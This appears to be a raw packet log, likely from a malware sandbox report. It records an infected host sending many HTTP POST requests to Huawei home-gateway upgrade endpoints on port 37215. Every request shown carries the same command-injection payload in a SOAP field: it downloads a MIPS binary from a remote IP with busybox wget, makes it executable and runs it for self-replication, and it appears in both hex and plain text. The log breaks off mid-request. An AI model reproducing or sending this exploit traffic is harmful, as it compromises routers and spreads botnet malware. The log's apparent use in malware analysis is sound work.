                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1571192.168.2.2360122197.195.51.14237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.550698996 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1572192.168.2.2339910157.192.16.5037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.550698996 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1573192.168.2.2358608197.223.164.21837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.550961971 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1574192.168.2.2336758197.253.187.18037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.551016092 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1575192.168.2.233561262.83.221.12737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.551043987 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1576192.168.2.233901041.248.19.7037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.551131010 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1577192.168.2.2343310157.178.179.11937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.551131010 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1578192.168.2.2360202117.218.233.3037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.551728964 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1579192.168.2.234201241.9.73.15937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.551824093 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1580192.168.2.233480841.120.249.24237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.551827908 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
